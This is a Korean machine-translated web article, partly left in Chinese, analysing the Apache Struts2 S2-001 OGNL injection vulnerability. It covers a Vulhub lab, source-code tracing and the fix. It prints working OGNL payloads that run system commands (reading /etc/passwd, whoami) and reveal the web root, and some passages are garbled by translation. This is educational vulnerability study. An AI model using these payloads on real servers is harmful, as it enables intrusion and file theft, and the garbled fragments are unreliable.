Struts2 취약점 S2-001 예제 분석

王林
풀어 주다: 2023-05-15 15:58:14
앞으로
1178명이 탐색했습니다.

Vulhub 취약점 시리즈: struts2 취약점 S2-001

1. 취약점 설명:

struts2 취약점 S2-001은 사용자가 양식 데이터를 제출하고 확인이 실패하는 경우 서버가 OGNL 표현식을 사용하여 사용자가 이전에 제출한 매개변수 값을 구문 분석합니다. , %{ value} 및 해당 양식 데이터를 다시 채웁니다. 예를 들어 등록 또는 로그인 페이지에서. 제출이 실패하면 서버는 일반적으로 이전에 제출된 데이터를 반환하도록 기본 설정됩니다. 서버는 %{value}를 사용하여 제출된 데이터에 대해 OGNL 표현식 구문 분석을 수행하므로 서버는 명령을 실행하기 위해 페이로드를 직접 보낼 수 있습니다.

2.vulhub 취약점 악용:

vulhub를 사용하여 취약점을 재현하면 환경 구축 과정을 절약할 수 있어 매우 편리합니다.

vulhub 공식 홈페이지 주소 : https://vulhub.org

struts2漏洞 S2-001实例分析struts2漏洞 S2-001实例分析

취약점 환경을 시작하세요.

docker-compsoe up -d
로그인 후 복사

테스트 페이로드를 입력하세요

%{1+1}
로그인 후 복사

struts2漏洞 S2-001实例分析덧셈 표현식이 성공적으로 실행된 것을 확인할 수 있습니다.

struts2漏洞 S2-001实例分析

이번에는 명령 실행을 시도합니다. new java.lang.String[ {"cat","/etc/passwd"} 여기서 실행하려는 명령을 변경합니다.

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[ {"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
로그인 후 복사

struts2漏洞 S2-001实例分析passwd 파일을 성공적으로 읽었습니다. ㅋㅋㅋ "사용자. dir")+"}"}

struts2漏洞 S2-001实例分析

웹 경로 가져오기 %{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=# context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close() }
명령 실행 %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream (true).start(),#b=#a.getInputStream(),#c=새 java.io.InputStreamReader(#b),#d=새 java.io.BufferedReader(#c),#e=새 char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String (#e)),#f.getWriter().flush(),#f.getWriter().close()}

3.搭建环境

平台:win10

工具:Apache Tomcat 9.0.7,IntelliJ IDEA

下载IntelliJ IDE之后我们选择免费试用一个月,接下来创建我们的项目。

struts2漏洞 S2-001实例分析这个是搭建完成后的效果,下边所有创建添加的jar包或者修改的文件都按照这个格式进行。

struts2漏洞 S2-001实例分析目录结构如下。

struts2漏洞 S2-001实例分析

需要如下几个包,下载地址:

http://archive.apache.org/dist/struts/binaries/struts-2.0.1-all.zip

解压完之后,我们把lib目录下对应的jar包导入到我们在项目中创建的lib目录中。

struts2漏洞 S2-001实例分析

struts2漏洞 S2-001实例分析

接着发布我们导入的jar包,不然会报错。

struts2漏洞 S2-001实例分析

接下来就是我们要创建的几个文件,这里代码都给出来了,直接copy就行。(注意:一定要按照前边给出的目录结构放置下边的文件)

web.xml

 S2-001 Examplestruts2org.apache.struts2.dispatcher.FilterDispatcherstruts2/*index.jsp 
로그인 후 복사

index.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ taglib prefix="s" uri="/struts-tags" %>     S2-001 

S2-001 Demo

link: https://cwiki.apache.org/confluence/display/WW/S2-001

로그인 후 복사

welcome.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ taglib prefix="s" uri="/struts-tags" %>   S2-001 

Hello

로그인 후 복사

LoginAction.java

package com.demo.action; import com.opensymphony.xwork2.ActionSupport; public class LoginAction extends ActionSupport { private String username = null; private String password = null; public String getUsername() { return this.username; } public String getPassword() { return this.password; } public void setUsername(String username) { this.username = username; } public void setPassword(String password) { this.password = password; } public String execute() throws Exception { if ((this.username.isEmpty()) || (this.password.isEmpty())) { return "error"; } if ((this.username.equalsIgnoreCase("admin")) && (this.password.equals("admin"))) { return "success"; } return "error"; } }
로그인 후 복사

src目录下新建struts.xml

  welcome.jspindex.jsp 
로그인 후 복사

4.原理分析

漏洞部分代码

xwork-2.0-beta-1.jar/com.opensymphony.xwork2/util/TextParseUtil.java

public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, TextParseUtil.ParsedValueEvaluator evaluator) { Object result = expression; while(true) { int start = expression.indexOf(open + "{"); int length = expression.length(); int x = start + 2; int count = 1; while(start != -1 && x < length && count != 0) { char c = expression.charAt(x++); if (c == '{') { ++count; } else if (c == '}') { --count; } } int end = x - 1; if (start == -1 || end == -1 || count != 0) { return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType); } String var = expression.substring(start + 2, end); Object o = stack.findValue(var, asType); if (evaluator != null) { o = evaluator.evaluate(o); } String left = expression.substring(0, start); String right = expression.substring(end + 1); if (o != null) { if (TextUtils.stringSet(left)) { result = left + o; } else { result = o; } if (TextUtils.stringSet(right)) { result = result + right; } expression = left + o + right; } else { result = left + right; expression = left + right; } } }
로그인 후 복사

运行我们搭建好的环境,记得开启debug模式

struts2漏洞 S2-001实例分析password处输入我们的测试语句:%{333*666},正确结果是多少来着,待我找个计算机算一下先(手动笑哭表情)

struts2漏洞 S2-001实例分析

expression会获取不同的参数值,我们直到其获取到password开始分析漏洞原因。

struts2漏洞 S2-001实例分析struts2漏洞 S2-001实例分析然后这次的判断跳过了中间的return,为啥会跳过return呢?因为这里的password内容任然是一个ognl表达式所以会再次进入循环,接着这里取出%{password}中间的值password赋给var。struts2漏洞 S2-001实例分析在解析完%{password}表达式之后要获取其中的内容password进行展示,也就是我们这里的%{333*666}

struts2漏洞 S2-001实例分析然后这次的判断同样也会跳过中间的return,为啥会跳过return呢?因为这里的password内容依然是一个ognl表达式所以会再次进入循环,接着这里取出%{333*666}中间的值333*666赋给var。

struts2漏洞 S2-001实例分析

然后通过Object o = stack.findValue(var, asType)获得到password的值为333*666,然后重新赋值给expression,进行下一次循环。

在这一次循环的时候,就会解析333*666,并将赋值给了o,经过计算后expression的值就变成了221788。

struts2漏洞 S2-001实例分析不是OGNL表达式时就会进入

struts2漏洞 S2-001实例分析struts2漏洞 S2-001实例分析

5.漏洞修复

判断了循环的次数,从而在解析到%{333*666}的时候不会继续向下递归,相当于限制了解析ongl的次数。

struts2漏洞 S2-001实例分析

也就不会对用户提交的参数进行ongl解析

if (loopCount > maxLoopCount) { // translateVariables prevent infinite loop / expression recursive evaluation break; }
로그인 후 복사

6.OGNL表达式

这里搬运大佬总结好的东西。

OGNL은 Object-Graph Navigation Language의 약어로, 간단하고 일관된 표현 구문을 통해 객체의 모든 속성에 액세스하고 객체의 메서드를 호출할 수 있는 강력한 표현 언어입니다. 전체 객체의 구조 다이어그램을 탐색하고 필드 유형 변환과 같은 기능을 구현합니다. 동일한 표현식을 사용하여 객체의 속성에 액세스합니다. OGNL의 세 가지 요소: (다음 부분은 인터넷 어딘가에서 발췌한 내용인데 잘 말한 것 같습니다.)

1. 표현식

표현식은 전체 OGNL의 핵심입니다. 모든 OGNL 작업은 표현식을 구문 분석한 후 수행됩니다. 의. 표현식은 이 OGNL 작업이 정확히 무엇을 수행할지 지정합니다. 위 테스트에서 name, Department.name 등은 모두 name 또는 name in Department의 값을 취함을 나타내는 표현식임을 알 수 있습니다. OGNL은 다양한 유형의 표현식을 지원하며 나중에 더 자세히 살펴보겠습니다.

2. 루트 객체

루트 객체는 OGNL의 작업 객체로 이해될 수 있습니다. 표현이 "무엇을 할지"를 명시한 후에는 "누구에게" 그 일을 할지를 명시해야 합니다. 위의 테스트 코드에서 user는 루트 객체입니다. 이는 사용자 개체에 대한 이름 속성 값을 가져와야 함을 의미합니다(그리고 사용자 개체에 대한 부서에서 이름 속성 값을 설정해야 함).

3. Context

표현식과 루트 개체를 사용하면 OGNL의 기본 기능을 실제로 사용할 수 있습니다. 예를 들어 표현식을 기반으로 루트 개체의 값을 가져오거나 설정합니다. 그러나 실제로 OGNL 내에서 모든 작업은 OGNL의 컨텍스트인 특정 환경에서 실행됩니다. 더 명확하게 말하면 OGNL 작업을 "수행할 위치"를 지정하는 것이 바로 이 컨텍스트입니다.
OGN L의 컨텍스트는 OgnlContext라는 Map 구조입니다. 위에서 언급한 루트 객체(Root
Object)는 실제로 컨텍스트 환경에 추가되며, 이는 특수 변수, 특히 루트 객체(Root
Object)의 저장 공간으로 처리됩니다. # 기호를 추가하여 구별할 필요는 없습니다. 표현식 함수 연산 목록:

예: xxxx, xxxx.xxxx, xxxx. OGNL은 배열 및 ArrayList와 같은 컨테이너에 대한 순차적 액세스를 지원합니다. 예: group.users[0] 동시에 OGNL은 Map에 대한 키 값 검색을 지원합니다. 예: #session[ 'mySessionPropKey'] 그뿐만 아니라 OGNL은 컨테이너 구성을 위한 표현식도 지원합니다. 예: {"green", "red", "blue"}는 목록, #{"key1" : "value1", "key2를 구성합니다. " : "value2 ", "key3" : "value3"}지도 구성
예: #xxxx, #xxxx.xxxx, #xxxx.xxxxx., *, /, ++, --, ==, !=, = 및 기타 연산자를 사용할 수도 있습니다. 에 등등 4. 컨테이너, 배열, 개체
모든 클래스 객체의 생성자를 통해 새 객체를 생성할 수도 있습니다
예: new Java.net.URL("xxxxxx/") 5. 정적 메서드 또는 변수 클래스의 정적 메서드 및 필드에 액세스하려면 @class@member 또는 @class@method(args)와 같은 방식으로 표현됩니다. 6. 메서드 호출
은 Java와 유사한 메서드를 통해 직접 수행됩니다.
예: user.getName(), group.users.size(), group.containsUser(#requestUser) 7. 투영 및 선택
OGNL은 다음과 유사한 투영 및 선택을 지원합니다. 데이터 베이스.
Projection은 **에 있는 각 요소의 동일한 속성을 선택하여 새로운 **를 형성하는 것으로, 관계형 데이터베이스의 필드 작업과 유사합니다. 프로젝션 작업 구문은 collection.{XXX}입니다. 여기서 XXX는 이 **에 있는 각 요소의 공개 속성입니다.
예: group.userList.{username}은 특정 그룹에 있는 모든 사용자의 이름 목록을 가져옵니다.
선택은 관계형 데이터베이스의 기록 작업과 유사하게 선택 조건에 맞는 ** 요소를 필터링하는 것입니다. 선택 작업의 구문은 collection.{X YYY}입니다. 여기서 X는 선택 연산자이고 그 뒤에 선택을 위한 논리 표현식이 옵니다. 세 가지 선택 연산자가 있습니다:
? 조건을 충족하는 모든 요소 선택
^ 조건을 충족하는 첫 번째 요소 선택
$ 조건을 충족하는 마지막 요소 선택
예: group.userList.{? = null }은 특정 그룹에서 이름이 비어 있지 않은 사용자 목록을 가져옵니다.



위 내용은 Struts2 취약점 S2-001 예제 분석의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:yisu.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
저자별 최신 기사
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿
회사 소개 부인 성명 Sitemap
PHP 중국어 웹사이트:공공복지 온라인 PHP 교육,PHP 학습자의 빠른 성장을 도와주세요!